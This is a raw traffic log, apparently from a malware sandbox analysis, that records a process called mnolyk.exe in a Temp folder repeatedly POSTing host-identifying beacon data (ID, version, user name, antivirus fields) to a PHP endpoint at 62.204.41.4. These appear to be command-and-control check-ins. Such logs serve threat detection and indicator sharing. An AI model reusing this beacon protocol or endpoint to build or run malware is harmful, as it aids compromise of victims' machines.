Feb 7, 2023 19:58:58.328195095 CET	632	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:58.392267942 CET	632	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
407	192.168.2.5	50118	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:58.558092117 CET	633	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:58.621646881 CET	633	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
408	192.168.2.5	50119	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:58.794403076 CET	634	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:58.859575033 CET	634	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
409	192.168.2.5	50120	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:59.032259941 CET	635	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:59.098303080 CET	635	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
41	192.168.2.5	49741	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:15.910290003 CET	169	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:15.974092007 CET	169	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
410	192.168.2.5	50121	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:59.277721882 CET	636	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:59.342204094 CET	636	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
411	192.168.2.5	50122	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:59.516632080 CET	637	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:59.582931995 CET	637	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
412	192.168.2.5	50123	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:59.760627031 CET	638	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:59.823899031 CET	638	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
413	192.168.2.5	50124	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:00.013175011 CET	639	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:00.081590891 CET	639	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
414	192.168.2.5	50125	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:00.262200117 CET	640	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:00.328234911 CET	640	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
415	192.168.2.5	50126	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:00.503245115 CET	641	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:00.568260908 CET	641	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
416	192.168.2.5	50127	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:00.745196104 CET	642	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:00.809978962 CET	642	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
417	192.168.2.5	50128	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:00.987231016 CET	643	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:01.053416967 CET	643	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
418	192.168.2.5	50129	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:01.428744078 CET	644	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:01.493778944 CET	644	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
419	192.168.2.5	50130	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:01.720565081 CET	645	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:01.786930084 CET	645	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
42	192.168.2.5	49742	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:16.147994041 CET	170	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:16.211469889 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
420	192.168.2.5	50131	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:02.039230108 CET	646	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:02.106717110 CET	646	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
421	192.168.2.5	50132	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:02.326822996 CET	647	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:02.390543938 CET	647	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
422	192.168.2.5	50133	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:03.417426109 CET	648	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:03.484019041 CET	648	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
423	192.168.2.5	50134	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:04.959508896 CET	649	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:05.025031090 CET	649	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
424	192.168.2.5	50135	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:05.579215050 CET	650	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:05.642651081 CET	650	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
425	192.168.2.5	50136	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:05.899724007 CET	651	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:05.962744951 CET	651	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
